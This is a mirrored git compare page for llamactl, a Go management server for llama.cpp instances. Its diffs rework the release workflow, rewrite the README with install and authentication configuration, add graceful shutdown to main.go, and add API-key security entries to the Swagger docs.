mirror of
https://github.com/lordmathis/llamactl.git
synced 2025-11-06 00:54:23 +00:00
Compare commits
36 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| 8d9c808be1 | |||
| 161cd213c5 | |||
| d6e84f0527 | |||
| 0846350d41 | |||
| dacaca8594 | |||
| 6e3f5cec61 | |||
| 85b3638efb | |||
| 934d1c5aaa | |||
| 2abe9c282e | |||
| 6a7a9a2d09 | |||
| a3c44dad1e | |||
| 7426008ef9 | |||
| cf26aa521a | |||
| d94c922314 | |||
| 3cbd23a6e2 | |||
| bed172bf73 | |||
| d449255bc9 | |||
| de89d0673a | |||
| dd6ffa548c | |||
| 7935f19cc1 | |||
| f1718198a3 | |||
| b24d744cad | |||
| fff8b2dbde | |||
| b94909dee4 | |||
| ae1bf8561f | |||
| ad117ef6c6 | |||
| 169432260a | |||
| f94a150b07 | |||
| c038cabaf6 | |||
| 89f90697ef | |||
| 8e8056f071 | |||
| 4d06bc487a | |||
| bedec089ef | |||
| b3540d5b3e | |||
| 72ba008d1e | |||
| 0aa5def9ec |
59
.github/workflows/release.yaml
vendored
59
.github/workflows/release.yaml
vendored
@@ -108,63 +108,9 @@ jobs:
|
||||
*.zip
|
||||
retention-days: 1
|
||||
|
||||
generate-changelog:
|
||||
name: Generate Changelog
|
||||
runs-on: ubuntu-latest
|
||||
outputs:
|
||||
changelog: ${{ steps.changelog.outputs.changelog }}
|
||||
steps:
|
||||
- name: Checkout repository
|
||||
uses: actions/checkout@v4
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Generate changelog
|
||||
id: changelog
|
||||
run: |
|
||||
# Get the previous tag
|
||||
PREVIOUS_TAG=$(git tag --sort=-version:refname | grep -v "^${{ github.ref_name }}$" | head -n1)
|
||||
|
||||
if [ -z "$PREVIOUS_TAG" ]; then
|
||||
echo "No previous tag found, generating changelog from first commit"
|
||||
PREVIOUS_TAG=$(git rev-list --max-parents=0 HEAD)
|
||||
fi
|
||||
|
||||
echo "Generating changelog from $PREVIOUS_TAG to ${{ github.ref_name }}"
|
||||
|
||||
# Generate changelog
|
||||
CHANGELOG=$(cat << 'EOL'
|
||||
## What's Changed
|
||||
|
||||
EOL
|
||||
)
|
||||
|
||||
# Get commits between tags
|
||||
COMMITS=$(git log --pretty=format:"* %s (%h)" "$PREVIOUS_TAG..${{ github.ref_name }}" --no-merges)
|
||||
|
||||
if [ -z "$COMMITS" ]; then
|
||||
CHANGELOG="${CHANGELOG}* No changes since previous release"
|
||||
else
|
||||
CHANGELOG="${CHANGELOG}${COMMITS}"
|
||||
fi
|
||||
|
||||
# Add full changelog link if we have a previous tag and it's not a commit hash
|
||||
if [[ "$PREVIOUS_TAG" =~ ^v[0-9] ]]; then
|
||||
CHANGELOG="${CHANGELOG}
|
||||
|
||||
**Full Changelog**: https://github.com/${{ github.repository }}/compare/${PREVIOUS_TAG}...${{ github.ref_name }}"
|
||||
fi
|
||||
|
||||
# Save changelog to output (handle multiline)
|
||||
{
|
||||
echo 'changelog<<EOF'
|
||||
echo "$CHANGELOG"
|
||||
echo EOF
|
||||
} >> $GITHUB_OUTPUT
|
||||
|
||||
release:
|
||||
name: Create Release
|
||||
needs: [build, generate-changelog]
|
||||
needs: [build]
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Download all artifacts
|
||||
@@ -184,8 +130,9 @@ jobs:
|
||||
uses: softprops/action-gh-release@v2
|
||||
with:
|
||||
name: Release ${{ github.ref_name }}
|
||||
body: ${{ needs.generate-changelog.outputs.changelog }}
|
||||
tag_name: ${{ github.ref_name }}
|
||||
files: release-assets/*
|
||||
generate_release_notes: true
|
||||
draft: false
|
||||
prerelease: ${{ contains(github.ref_name, '-') }}
|
||||
env:
|
||||
|
||||
291
README.md
291
README.md
@@ -2,79 +2,151 @@
|
||||
|
||||
  
|
||||
|
||||
A control server for managing multiple Llama Server instances with a web-based dashboard.
|
||||
**Management server for multiple llama.cpp instances with OpenAI-compatible API routing.**
|
||||
|
||||
## Features
|
||||
## Why llamactl?
|
||||
|
||||
- **Multi-instance Management**: Create, start, stop, restart, and delete multiple llama-server instances
|
||||
- **Web Dashboard**: Modern React-based UI for managing instances
|
||||
- **Auto-restart**: Configurable automatic restart on instance failure
|
||||
- **Instance Monitoring**: Real-time health checks and status monitoring
|
||||
- **Log Management**: View, search, and download instance logs
|
||||
- **REST API**: Full API for programmatic control
|
||||
- **OpenAI Compatible**: Route requests to instances by instance name
|
||||
- **Configuration Management**: Comprehensive llama-server parameter support
|
||||
- **System Information**: View llama-server version, devices, and help
|
||||
🚀 **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
|
||||
🔗 **OpenAI API Compatible**: Drop-in replacement - route requests by model name
|
||||
🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
|
||||
🔐 **API Key Authentication**: Separate keys for management vs inference access
|
||||
📊 **Instance Monitoring**: Health checks, auto-restart, log management
|
||||
⚡ **Persistent State**: Instances survive server restarts
|
||||
|
||||
## Prerequisites
|
||||
**Choose llamactl if**: You need authentication, health monitoring, auto-restart, and centralized management of multiple llama-server instances
|
||||
**Choose Ollama if**: You want the simplest setup with strong community ecosystem and third-party integrations
|
||||
**Choose LM Studio if**: You prefer a polished desktop GUI experience with easy model management
|
||||
|
||||
This project requires `llama-server` from llama.cpp to be installed and available in your PATH.
|
||||
## Quick Start
|
||||
|
||||
**Install llama.cpp:**
|
||||
Follow the installation instructions at https://github.com/ggml-org/llama.cpp
|
||||
```bash
|
||||
# 1. Install llama-server (one-time setup)
|
||||
# See: https://github.com/ggml-org/llama.cpp#quick-start
|
||||
|
||||
# 2. Download and run llamactl
|
||||
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
|
||||
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz | tar -xz
|
||||
sudo mv llamactl /usr/local/bin/
|
||||
|
||||
# 3. Start the server
|
||||
llamactl
|
||||
# Access dashboard at http://localhost:8080
|
||||
```
|
||||
|
||||
## Usage
|
||||
|
||||
### Create and manage instances via web dashboard:
|
||||
1. Open http://localhost:8080
|
||||
2. Click "Create Instance"
|
||||
3. Set model path and GPU layers
|
||||
4. Start or stop the instance
|
||||
|
||||
### Or use the REST API:
|
||||
```bash
|
||||
# Create instance
|
||||
curl -X POST localhost:8080/api/v1/instances/my-7b-model \
|
||||
-H "Authorization: Bearer your-key" \
|
||||
-d '{"model": "/path/to/model.gguf", "gpu_layers": 32}'
|
||||
|
||||
# Use with OpenAI SDK
|
||||
curl -X POST localhost:8080/v1/chat/completions \
|
||||
-H "Authorization: Bearer your-key" \
|
||||
-d '{"model": "my-7b-model", "messages": [{"role": "user", "content": "Hello!"}]}'
|
||||
```
|
||||
|
||||
## Installation
|
||||
|
||||
### Build Requirements
|
||||
|
||||
- Go 1.24 or later
|
||||
- Node.js 22 or later (for building the web UI)
|
||||
|
||||
### Building with Web UI
|
||||
### Option 1: Download Binary (Recommended)
|
||||
|
||||
```bash
|
||||
# Clone the repository
|
||||
# Linux/macOS - Get latest version and download
|
||||
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
|
||||
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
|
||||
sudo mv llamactl /usr/local/bin/
|
||||
|
||||
# Or download manually from the releases page:
|
||||
# https://github.com/lordmathis/llamactl/releases/latest
|
||||
|
||||
# Windows - Download from releases page
|
||||
```
|
||||
|
||||
### Option 2: Build from Source
|
||||
Requires Go 1.24+ and Node.js 22+
|
||||
```bash
|
||||
git clone https://github.com/lordmathis/llamactl.git
|
||||
cd llamactl
|
||||
|
||||
# Install Node.js dependencies
|
||||
cd webui
|
||||
npm ci
|
||||
|
||||
# Build the web UI
|
||||
npm run build
|
||||
|
||||
# Return to project root and build
|
||||
cd ..
|
||||
cd webui && npm ci && npm run build && cd ..
|
||||
go build -o llamactl ./cmd/server
|
||||
```
|
||||
|
||||
# Run the server
|
||||
./llamactl
|
||||
## Prerequisites
|
||||
|
||||
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
|
||||
|
||||
```bash
|
||||
# Quick install methods:
|
||||
# Homebrew (macOS)
|
||||
brew install llama.cpp
|
||||
|
||||
# Or build from source - see llama.cpp docs
|
||||
```
|
||||
|
||||
## Configuration
|
||||
|
||||
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
|
||||
llamactl works out of the box with sensible defaults.
|
||||
|
||||
1. Hardcoded defaults
|
||||
2. Configuration file
|
||||
3. Environment variables
|
||||
```yaml
|
||||
server:
|
||||
host: "0.0.0.0" # Server host to bind to
|
||||
port: 8080 # Server port to bind to
|
||||
allowed_origins: ["*"] # Allowed CORS origins (default: all)
|
||||
enable_swagger: false # Enable Swagger UI for API docs
|
||||
|
||||
instances:
|
||||
port_range: [8000, 9000] # Port range for instances
|
||||
data_dir: ~/.local/share/llamactl # Data directory (platform-specific, see below)
|
||||
configs_dir: ~/.local/share/llamactl/instances # Instance configs directory
|
||||
logs_dir: ~/.local/share/llamactl/logs # Logs directory
|
||||
auto_create_dirs: true # Auto-create data/config/logs dirs if missing
|
||||
max_instances: -1 # Max instances (-1 = unlimited)
|
||||
llama_executable: llama-server # Path to llama-server executable
|
||||
default_auto_restart: true # Auto-restart new instances by default
|
||||
default_max_restarts: 3 # Max restarts for new instances
|
||||
default_restart_delay: 5 # Restart delay (seconds) for new instances
|
||||
|
||||
auth:
|
||||
require_inference_auth: true # Require auth for inference endpoints
|
||||
inference_keys: [] # Keys for inference endpoints
|
||||
require_management_auth: true # Require auth for management endpoints
|
||||
management_keys: [] # Keys for management endpoints
|
||||
```
|
||||
|
||||
<details><summary><strong>Full Configuration Guide</strong></summary>
|
||||
|
||||
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
|
||||
|
||||
```
|
||||
Defaults < Configuration file < Environment variables
|
||||
```
|
||||
|
||||
### Configuration Files
|
||||
|
||||
Configuration files are searched in the following locations:
|
||||
#### Configuration File Locations
|
||||
|
||||
Configuration files are searched in the following locations (in order of precedence):
|
||||
|
||||
**Linux/macOS:**
|
||||
- `./llamactl.yaml` or `./config.yaml` (current directory)
|
||||
- `~/.config/llamactl/config.yaml`
|
||||
- `$HOME/.config/llamactl/config.yaml`
|
||||
- `/etc/llamactl/config.yaml`
|
||||
|
||||
**Windows:**
|
||||
- `./llamactl.yaml` or `./config.yaml` (current directory)
|
||||
- `%APPDATA%\llamactl\config.yaml`
|
||||
- `%USERPROFILE%\llamactl\config.yaml`
|
||||
- `%PROGRAMDATA%\llamactl\config.yaml`
|
||||
|
||||
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable
|
||||
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable.
|
||||
|
||||
### Configuration Options
|
||||
|
||||
@@ -82,20 +154,27 @@ You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment
|
||||
|
||||
```yaml
|
||||
server:
|
||||
host: "" # Server host to bind to (default: "")
|
||||
port: 8080 # Server port to bind to (default: 8080)
|
||||
host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
|
||||
port: 8080 # Server port to bind to (default: 8080)
|
||||
allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
|
||||
enable_swagger: false # Enable Swagger UI (default: false)
|
||||
```
|
||||
|
||||
**Environment Variables:**
|
||||
- `LLAMACTL_HOST` - Server host
|
||||
- `LLAMACTL_PORT` - Server port
|
||||
- `LLAMACTL_ALLOWED_ORIGINS` - Comma-separated CORS origins
|
||||
- `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
|
||||
|
||||
#### Instance Configuration
|
||||
|
||||
```yaml
|
||||
instances:
|
||||
port_range: [8000, 9000] # Port range for instances
|
||||
log_directory: "/tmp/llamactl" # Directory for instance logs
|
||||
port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
|
||||
data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
|
||||
configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
|
||||
logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
|
||||
auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
|
||||
max_instances: -1 # Maximum instances (-1 = unlimited)
|
||||
llama_executable: "llama-server" # Path to llama-server executable
|
||||
default_auto_restart: true # Default auto-restart setting
|
||||
@@ -105,122 +184,34 @@ instances:
|
||||
|
||||
**Environment Variables:**
|
||||
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
|
||||
- `LLAMACTL_LOG_DIR` - Log directory path
|
||||
- `LLAMACTL_DATA_DIRECTORY` - Data directory path
|
||||
- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
|
||||
- `LLAMACTL_LOGS_DIR` - Log directory path
|
||||
- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
|
||||
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
|
||||
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
|
||||
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
|
||||
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
|
||||
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
|
||||
|
||||
### Example Configuration
|
||||
#### Authentication Configuration
|
||||
|
||||
```yaml
|
||||
server:
|
||||
host: "0.0.0.0"
|
||||
port: 8080
|
||||
|
||||
instances:
|
||||
port_range: [8001, 8100]
|
||||
log_directory: "/var/log/llamactl"
|
||||
max_instances: 10
|
||||
llama_executable: "/usr/local/bin/llama-server"
|
||||
default_auto_restart: true
|
||||
default_max_restarts: 5
|
||||
default_restart_delay: 10
|
||||
auth:
|
||||
require_inference_auth: true # Require API key for OpenAI endpoints (default: true)
|
||||
inference_keys: [] # List of valid inference API keys
|
||||
require_management_auth: true # Require API key for management endpoints (default: true)
|
||||
management_keys: [] # List of valid management API keys
|
||||
```
|
||||
|
||||
## Usage
|
||||
**Environment Variables:**
|
||||
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
|
||||
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
|
||||
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
|
||||
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
|
||||
|
||||
### Starting the Server
|
||||
|
||||
```bash
|
||||
# Start with default configuration
|
||||
./llamactl
|
||||
|
||||
# Start with custom config file
|
||||
LLAMACTL_CONFIG_PATH=/path/to/config.yaml ./llamactl
|
||||
|
||||
# Start with environment variables
|
||||
LLAMACTL_PORT=9090 LLAMACTL_LOG_DIR=/custom/logs ./llamactl
|
||||
```
|
||||
|
||||
### Web Dashboard
|
||||
|
||||
Open your browser and navigate to `http://localhost:8080` to access the web dashboard.
|
||||
|
||||
### API Usage
|
||||
|
||||
The REST API is available at `http://localhost:8080/api/v1`. See the Swagger documentation at `http://localhost:8080/swagger/` for complete API reference.
|
||||
|
||||
#### Create an Instance
|
||||
|
||||
```bash
|
||||
curl -X POST http://localhost:8080/api/v1/instances/my-instance \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{
|
||||
"model": "/path/to/model.gguf",
|
||||
"gpu_layers": 32,
|
||||
"auto_restart": true
|
||||
}'
|
||||
```
|
||||
|
||||
#### List Instances
|
||||
|
||||
```bash
|
||||
curl http://localhost:8080/api/v1/instances
|
||||
```
|
||||
|
||||
#### Start/Stop Instance
|
||||
|
||||
```bash
|
||||
# Start
|
||||
curl -X POST http://localhost:8080/api/v1/instances/my-instance/start
|
||||
|
||||
# Stop
|
||||
curl -X POST http://localhost:8080/api/v1/instances/my-instance/stop
|
||||
```
|
||||
|
||||
### OpenAI Compatible Endpoints
|
||||
|
||||
Route requests to instances by including the instance name as the model parameter:
|
||||
|
||||
```bash
|
||||
curl -X POST http://localhost:8080/v1/chat/completions \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{
|
||||
"model": "my-instance",
|
||||
"messages": [{"role": "user", "content": "Hello!"}]
|
||||
}'
|
||||
```
|
||||
|
||||
## Development
|
||||
|
||||
### Running Tests
|
||||
|
||||
```bash
|
||||
# Go tests
|
||||
go test ./...
|
||||
|
||||
# Web UI tests
|
||||
cd webui
|
||||
npm test
|
||||
```
|
||||
|
||||
### Development Server
|
||||
|
||||
```bash
|
||||
# Start Go server in development mode
|
||||
go run ./cmd/server
|
||||
|
||||
# Start web UI development server (in another terminal)
|
||||
cd webui
|
||||
npm run dev
|
||||
```
|
||||
|
||||
## API Documentation
|
||||
|
||||
Interactive API documentation is available at `http://localhost:8080/swagger/` when the server is running.
|
||||
</details>
|
||||
|
||||
## License
|
||||
|
||||
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.
|
||||
MIT License - see [LICENSE](LICENSE) file.
|
||||
|
||||
@@ -2,9 +2,13 @@ package main
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
llamactl "llamactl/pkg"
|
||||
"llamactl/pkg/config"
|
||||
"llamactl/pkg/manager"
|
||||
"llamactl/pkg/server"
|
||||
"net/http"
|
||||
"os"
|
||||
"os/signal"
|
||||
"syscall"
|
||||
)
|
||||
|
||||
// @title llamactl API
|
||||
@@ -15,29 +19,63 @@ import (
|
||||
// @basePath /api/v1
|
||||
func main() {
|
||||
|
||||
config, err := llamactl.LoadConfig("")
|
||||
configPath := os.Getenv("LLAMACTL_CONFIG_PATH")
|
||||
cfg, err := config.LoadConfig(configPath)
|
||||
if err != nil {
|
||||
fmt.Printf("Error loading config: %v\n", err)
|
||||
fmt.Println("Using default configuration.")
|
||||
}
|
||||
|
||||
// Create the log directory if it doesn't exist
|
||||
err = os.MkdirAll(config.Instances.LogDirectory, 0755)
|
||||
if err != nil {
|
||||
fmt.Printf("Error creating log directory: %v\n", err)
|
||||
return
|
||||
// Create the data directory if it doesn't exist
|
||||
if cfg.Instances.AutoCreateDirs {
|
||||
if err := os.MkdirAll(cfg.Instances.InstancesDir, 0755); err != nil {
|
||||
fmt.Printf("Error creating config directory %s: %v\n", cfg.Instances.InstancesDir, err)
|
||||
fmt.Println("Persistence will not be available.")
|
||||
}
|
||||
|
||||
if err := os.MkdirAll(cfg.Instances.LogsDir, 0755); err != nil {
|
||||
fmt.Printf("Error creating log directory %s: %v\n", cfg.Instances.LogsDir, err)
|
||||
fmt.Println("Instance logs will not be available.")
|
||||
}
|
||||
}
|
||||
|
||||
// Initialize the instance manager
|
||||
instanceManager := llamactl.NewInstanceManager(config.Instances)
|
||||
instanceManager := manager.NewInstanceManager(cfg.Instances)
|
||||
|
||||
// Create a new handler with the instance manager
|
||||
handler := llamactl.NewHandler(instanceManager, config)
|
||||
handler := server.NewHandler(instanceManager, cfg)
|
||||
|
||||
// Setup the router with the handler
|
||||
r := llamactl.SetupRouter(handler)
|
||||
r := server.SetupRouter(handler)
|
||||
|
||||
// Start the server with the router
|
||||
fmt.Printf("Starting llamactl on port %d...\n", config.Server.Port)
|
||||
http.ListenAndServe(fmt.Sprintf("%s:%d", config.Server.Host, config.Server.Port), r)
|
||||
// Handle graceful shutdown
|
||||
stop := make(chan os.Signal, 1)
|
||||
signal.Notify(stop, os.Interrupt, syscall.SIGTERM)
|
||||
|
||||
server := http.Server{
|
||||
Addr: fmt.Sprintf("%s:%d", cfg.Server.Host, cfg.Server.Port),
|
||||
Handler: r,
|
||||
}
|
||||
|
||||
go func() {
|
||||
fmt.Printf("Llamactl server listening on %s:%d\n", cfg.Server.Host, cfg.Server.Port)
|
||||
if err := server.ListenAndServe(); err != nil && err != http.ErrServerClosed {
|
||||
fmt.Printf("Error starting server: %v\n", err)
|
||||
}
|
||||
}()
|
||||
|
||||
// Wait for shutdown signal
|
||||
<-stop
|
||||
fmt.Println("Shutting down server...")
|
||||
|
||||
if err := server.Close(); err != nil {
|
||||
fmt.Printf("Error shutting down server: %v\n", err)
|
||||
} else {
|
||||
fmt.Println("Server shut down gracefully.")
|
||||
}
|
||||
|
||||
// Wait for all instances to stop
|
||||
instanceManager.Shutdown()
|
||||
|
||||
fmt.Println("Exiting llamactl.")
|
||||
}
|
||||
|
||||
82
docs/docs.go
82
docs/docs.go
@@ -21,6 +21,11 @@ const docTemplate = `{
|
||||
"paths": {
|
||||
"/instances": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns a list of all instances managed by the server",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -47,6 +52,11 @@ const docTemplate = `{
|
||||
},
|
||||
"/instances/{name}": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns the details of a specific instance by name",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -83,6 +93,11 @@ const docTemplate = `{
|
||||
}
|
||||
},
|
||||
"put": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Updates the configuration of a specific instance by name",
|
||||
"consumes": [
|
||||
"application/json"
|
||||
@@ -131,6 +146,11 @@ const docTemplate = `{
|
||||
}
|
||||
},
|
||||
"post": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Creates a new instance with the provided configuration options",
|
||||
"consumes": [
|
||||
"application/json"
|
||||
@@ -179,6 +199,11 @@ const docTemplate = `{
|
||||
}
|
||||
},
|
||||
"delete": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Stops and removes a specific instance by name",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -214,6 +239,11 @@ const docTemplate = `{
|
||||
},
|
||||
"/instances/{name}/logs": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns the logs from a specific instance by name with optional line limit",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -258,6 +288,11 @@ const docTemplate = `{
|
||||
},
|
||||
"/instances/{name}/proxy": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Forwards HTTP requests to the llama-server instance running on a specific port",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -297,6 +332,11 @@ const docTemplate = `{
|
||||
}
|
||||
},
|
||||
"post": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Forwards HTTP requests to the llama-server instance running on a specific port",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -338,6 +378,11 @@ const docTemplate = `{
|
||||
},
|
||||
"/instances/{name}/restart": {
|
||||
"post": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Restarts a specific instance by name",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -376,6 +421,11 @@ const docTemplate = `{
|
||||
},
|
||||
"/instances/{name}/start": {
|
||||
"post": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Starts a specific instance by name",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -414,6 +464,11 @@ const docTemplate = `{
|
||||
},
|
||||
"/instances/{name}/stop": {
|
||||
"post": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Stops a specific instance by name",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -452,6 +507,11 @@ const docTemplate = `{
|
||||
},
|
||||
"/server/devices": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns a list of available devices for the llama server",
|
||||
"tags": [
|
||||
"server"
|
||||
@@ -475,6 +535,11 @@ const docTemplate = `{
|
||||
},
|
||||
"/server/help": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns the help text for the llama server command",
|
||||
"tags": [
|
||||
"server"
|
||||
@@ -498,6 +563,11 @@ const docTemplate = `{
|
||||
},
|
||||
"/server/version": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns the version of the llama server command",
|
||||
"tags": [
|
||||
"server"
|
||||
@@ -521,7 +591,12 @@ const docTemplate = `{
|
||||
},
|
||||
"/v1/": {
|
||||
"post": {
|
||||
"description": "Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body",
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body. Requires API key authentication via the ` + "`" + `Authorization` + "`" + ` header.",
|
||||
"consumes": [
|
||||
"application/json"
|
||||
],
|
||||
@@ -550,6 +625,11 @@ const docTemplate = `{
|
||||
},
|
||||
"/v1/models": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns a list of instances in a format compatible with OpenAI API",
|
||||
"tags": [
|
||||
"openai"
|
||||
|
||||
@@ -14,6 +14,11 @@
|
||||
"paths": {
|
||||
"/instances": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns a list of all instances managed by the server",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -40,6 +45,11 @@
|
||||
},
|
||||
"/instances/{name}": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns the details of a specific instance by name",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -76,6 +86,11 @@
|
||||
}
|
||||
},
|
||||
"put": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Updates the configuration of a specific instance by name",
|
||||
"consumes": [
|
||||
"application/json"
|
||||
@@ -124,6 +139,11 @@
|
||||
}
|
||||
},
|
||||
"post": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Creates a new instance with the provided configuration options",
|
||||
"consumes": [
|
||||
"application/json"
|
||||
@@ -172,6 +192,11 @@
|
||||
}
|
||||
},
|
||||
"delete": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Stops and removes a specific instance by name",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -207,6 +232,11 @@
|
||||
},
|
||||
"/instances/{name}/logs": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns the logs from a specific instance by name with optional line limit",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -251,6 +281,11 @@
|
||||
},
|
||||
"/instances/{name}/proxy": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Forwards HTTP requests to the llama-server instance running on a specific port",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -290,6 +325,11 @@
|
||||
}
|
||||
},
|
||||
"post": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Forwards HTTP requests to the llama-server instance running on a specific port",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -331,6 +371,11 @@
|
||||
},
|
||||
"/instances/{name}/restart": {
|
||||
"post": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Restarts a specific instance by name",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -369,6 +414,11 @@
|
||||
},
|
||||
"/instances/{name}/start": {
|
||||
"post": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Starts a specific instance by name",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -407,6 +457,11 @@
|
||||
},
|
||||
"/instances/{name}/stop": {
|
||||
"post": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Stops a specific instance by name",
|
||||
"tags": [
|
||||
"instances"
|
||||
@@ -445,6 +500,11 @@
|
||||
},
|
||||
"/server/devices": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns a list of available devices for the llama server",
|
||||
"tags": [
|
||||
"server"
|
||||
@@ -468,6 +528,11 @@
|
||||
},
|
||||
"/server/help": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
